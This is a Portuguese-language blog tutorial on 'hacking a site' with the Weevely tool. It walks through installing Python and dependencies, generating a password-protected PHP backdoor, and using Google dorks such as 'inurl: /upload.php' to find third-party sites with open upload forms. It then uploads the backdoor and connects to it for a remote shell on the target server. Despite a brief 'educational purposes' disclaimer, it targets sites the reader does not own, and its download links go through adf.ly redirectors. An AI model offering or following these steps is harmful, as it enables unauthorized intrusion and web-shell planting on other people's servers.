Como invadir um site - Weevely

Agora vou apresentar hum método de invadir site da site, seus diretórios etc, lembrando que isso e para fins educacionais.


1º - Você precisa ter o python 2.7 instalado, se você ainda não tem, aqui abaixo está o link para download, não se incomode eu odeio virus por isso estou fazendo este projeto open source.

Download Python 2.7: http://adf.ly/1aMyWz

2º - Agora precisamos baixar o nosso trunfo, o que nos dará acesso aos diretórios do site que vamos invadir.


3º - Certo, agora para que não haja nenhum erro, e também por obrigação você deve baixar o ultimo arquivo, que vai nos permitir instalar alguns scripts necessarios para que nossa ferramenta possa rodar normalmente.


Quando você extrair, ficará um pasta com o nome: setuptools-0.9.8, de preferencia salve no dico c:\
No meu caso, salvei dentro de uma pasta no c:\

No meu caso ficou assim:
C:\root\setuptools-0.9.8

4º - Vamos executar os programas agora.

Abra o CMD, entre no diretorio da pasta 'setuptools-0.9.8'
No meu caso: C:\root\setuptools-0.9.8

Agora vamos instalar os pacotes:
Digite no CMD dentro da pasta 'setuptools-0.9.8':

Digite: setup.py install

Aguarde, isso irá instalar alguns arquivos dentro da pasta 'c:\python27\scripts'

Navegue até essa pasta pelo CMD também, e estando dentro da pasta 'c:\python27\scripts' digite o seguinte:

easy_install.exe pip

Aguarde a instalação

Quando finalizar, ainda neste mesmo diretório digite:

pip install pyreadline pyyaml



Pronto, agora você pode entrar no diretorio onde salvou a pasta Weevely.
No meu caso:
c:\root\Weevely\

Dentro do diretorio digite: Weevely.py






Vai executar o programa, agora você digita:
Weevely.py help

isso vai exibir os comando, ajuda..


Para os fins deste tutorial vamos ver somente como criar a Backdoor em php.

Para gerar um php Backdoor, veja que o programa mostra uma sintaxe:
weevely generate 

Veja o exemplo:


A Senha deve conter caracteres

Depois de gerado o backdoor.php vamos buscar um site para carregar o arquivo, para explificar eu utilizei meu Servidor local, e vou deixar o link para download desse formulário de upload.

Baixar Formulário de Upload:
http://adf.ly/13027961/uploadweevely

Você pode usar dorks como essas para encontrar uploads:

inurl: /upload.php
inurl: /enviar.php
inurl: /file.php

etc, invente algumas dorks e encontre o site alvo.

Depois de ter enviado o aquivo backdoor.php:




Agora você digita:
Ex .: weevely.py http://www.seualvo.com/arquivos/upload/nome_da_sua_backdoor.php sua_senha

Veja meu ex .:



Veja que já Estou dentro do servidor:
@ carlos-pc: c: \ [...]

Para utilizar pode utilizar os comando do windows no cmd, digite: "cmd" como mostra a imagem.




Digite help para  obter Ajuda, e divirta-se.

Aguarde o vídeo já canal meu no Youtube e inscreva-se para não perder os melhores Vídeos de Segurança:

https://www.youtube.com/channel/UCnuJSAqeODzI_Lbj9f5Q2Dw


Mais Security

Premium By Raushan Design With Shroff Templates
Postagem Anterior Próxima Postagem